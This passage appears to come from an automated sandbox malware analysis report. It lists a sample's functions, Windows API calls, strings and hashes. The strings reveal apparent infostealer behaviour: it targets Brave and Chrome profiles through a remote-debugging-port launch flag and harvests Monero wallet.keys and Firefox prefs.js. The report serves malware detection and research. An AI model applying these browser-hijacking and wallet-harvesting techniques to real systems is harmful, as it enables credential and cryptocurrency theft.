                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00A50B32,00A50B2F,00000000,?,?,?,00A51450,00A50B2E), ref: 00A3BEC5
                                      • StrCmpCA.SHLWAPI(?,00A51454), ref: 00A3BF33
                                      • StrCmpCA.SHLWAPI(?,00A51458), ref: 00A3BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00A3C8BB
                                      Strings
                                      • Brave, xrefs: 00A3C0E8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00A3C495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00A3C3B2
                                      • Preferences, xrefs: 00A3C104
                                      • Google Chrome, xrefs: 00A3C6F8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00A3C534
                                      • \Brave\Preferences, xrefs: 00A3C1C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: c5dd622b906689fdf26f172db0b3fd64c9577021dae63a92c849f95920ccc8b2
                                      • Instruction ID: ce00ae0ba17cb4e9a8dfc89fee20f561eb92ed0bc21e16b1649c4841bccaca4c
                                      • Opcode Fuzzy Hash: c5dd622b906689fdf26f172db0b3fd64c9577021dae63a92c849f95920ccc8b2
                                      • Instruction Fuzzy Hash: 145297769501089BDB14FB70DE96FEE733DAFA4341F404598B50AA6191EE30AF48CF62
                                      Function 00A43B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00A43B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A43B33
                                      • lstrcat.KERNEL32(?,?), ref: 00A43B85
                                      • StrCmpCA.SHLWAPI(?,00A50F58), ref: 00A43B97
                                      • StrCmpCA.SHLWAPI(?,00A50F5C), ref: 00A43BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A43EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00A43ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: aa3422831293ce16a8e055268faeee99226233566c26ef05b345385324017dcc
                                      • Instruction ID: db5a24a4001ef3f12b369368ebc3d125b6e88c021f47162d1aec7ea7ede2c5ed
                                      • Opcode Fuzzy Hash: aa3422831293ce16a8e055268faeee99226233566c26ef05b345385324017dcc
                                      • Instruction Fuzzy Hash: 25A12376A00318ABDB24DF64DD85FEE7378BB94701F044588F60D9A181DB75AB88CF61
                                      Function 00A44B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00A44B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A44B93
                                      • StrCmpCA.SHLWAPI(?,00A50FC4), ref: 00A44BC1
                                      • StrCmpCA.SHLWAPI(?,00A50FC8), ref: 00A44BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A44DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00A44DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 5a3ee8f101f6f88acae4f09871a4ce3c4161d47979d14d92ea913a94eab709ef
                                      • Instruction ID: b992054f1dc8a28fd64f9c45155a6a32a99d6b6874253f410a6f0587c27e9d69
                                      • Opcode Fuzzy Hash: 5a3ee8f101f6f88acae4f09871a4ce3c4161d47979d14d92ea913a94eab709ef
                                      • Instruction Fuzzy Hash: 2A613976904218ABDB24EBA0DD45FEA737CBB48701F008588B50D96141EB71AB88CFA1
                                      Function 00A447C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A447D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A447D7
                                      • wsprintfA.USER32 ref: 00A447F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A4480D
                                      • StrCmpCA.SHLWAPI(?,00A50FAC), ref: 00A4483B
                                      • StrCmpCA.SHLWAPI(?,00A50FB0), ref: 00A44851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A448DB
                                      • FindClose.KERNEL32(000000FF), ref: 00A448F0
                                      • lstrcat.KERNEL32(?,0131F450), ref: 00A44915
                                      • lstrcat.KERNEL32(?,0131D9A0), ref: 00A44928
                                      • lstrlen.KERNEL32(?), ref: 00A44935
                                      • lstrlen.KERNEL32(?), ref: 00A44946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 003be8d88ac451ae0caa79c0d00a477aa09b3bc547d14101390e851d3f2bae8b
                                      • Instruction ID: 861df953acb8c52762156bc974b00fea329a84f7833a250593e6665dd995fbb3
                                      • Opcode Fuzzy Hash: 003be8d88ac451ae0caa79c0d00a477aa09b3bc547d14101390e851d3f2bae8b
                                      • Instruction Fuzzy Hash: 385145B5944318ABDB24EB70DD89FED737CAB58300F404588B64DD6190EB74AB88CFA1
                                      Function 00A440F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00A44113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A4412A
                                      • StrCmpCA.SHLWAPI(?,00A50F94), ref: 00A44158
                                      • StrCmpCA.SHLWAPI(?,00A50F98), ref: 00A4416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A442BC
                                      • FindClose.KERNEL32(000000FF), ref: 00A442D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: b3e3812d0b970159b5339a7511d8366e87070d986c83fbe1d6d68cc8ae360ab4
                                      • Instruction ID: d55d24e948e806a96e96cfe61959022669578fb1b17eea66d2411408a55fb593
                                      • Opcode Fuzzy Hash: b3e3812d0b970159b5339a7511d8366e87070d986c83fbe1d6d68cc8ae360ab4
                                      • Instruction Fuzzy Hash: 4F515CB5904218ABCB24EBB0DD45FEE737CBB98300F0046D8B65D96150DB75AB89CF64
                                      Function 00A3EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00A3EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00A3EE55
                                      • StrCmpCA.SHLWAPI(?,00A51630), ref: 00A3EEAB
                                      • StrCmpCA.SHLWAPI(?,00A51634), ref: 00A3EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00A3F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 60ed9948bb24a99897e6e58fc0b36acdd08073a29c5ceaeff4ff16ae53f0983c
                                      • Instruction ID: 32f036fcbc6234e8a9cd72f765f5f1104e35557ecf0e7b3fcff86dbda3572d45
                                      • Opcode Fuzzy Hash: 60ed9948bb24a99897e6e58fc0b36acdd08073a29c5ceaeff4ff16ae53f0983c
                                      • Instruction Fuzzy Hash: 75E136769511189BEB54FB60CEA2EEE733DAFA4340F4045D9B50A62092EF306F89CF51
                                      Function 00A70098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: 635c03e170ab6691e1a575a5b4652c5391ed2bd24116a72404132e76579a0e2a
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: 22E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      Function 00A3F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A516B0,00A50D97), ref: 00A3F81E
                                      • StrCmpCA.SHLWAPI(?,00A516B4), ref: 00A3F86F
                                      • StrCmpCA.SHLWAPI(?,00A516B8), ref: 00A3F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A3FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00A3FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: 5ae2d09c816e28ba8ce062bd30e0782330619b2f7e594e4e98c2e66247f60b8b
                                      • Instruction ID: 3319d6e2d623eb1626cdca1520b382776b8108c990e03e71ff8fb20d4abc570e
                                      • Opcode Fuzzy Hash: 5ae2d09c816e28ba8ce062bd30e0782330619b2f7e594e4e98c2e66247f60b8b
                                      • Instruction Fuzzy Hash: 41B163769502189FDB24FF60DE92FEE7379AFA4340F0045A8B50A56191EF306F49CB92
                                      Function 00A31710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A5523C,?,?,?,00A552E4,?,?,00000000,?,00000000), ref: 00A31963
                                      • StrCmpCA.SHLWAPI(?,00A5538C), ref: 00A319B3
                                      • StrCmpCA.SHLWAPI(?,00A55434), ref: 00A319C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A31D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A31E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00A31E60
                                      • FindClose.KERNEL32(000000FF), ref: 00A31E72
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
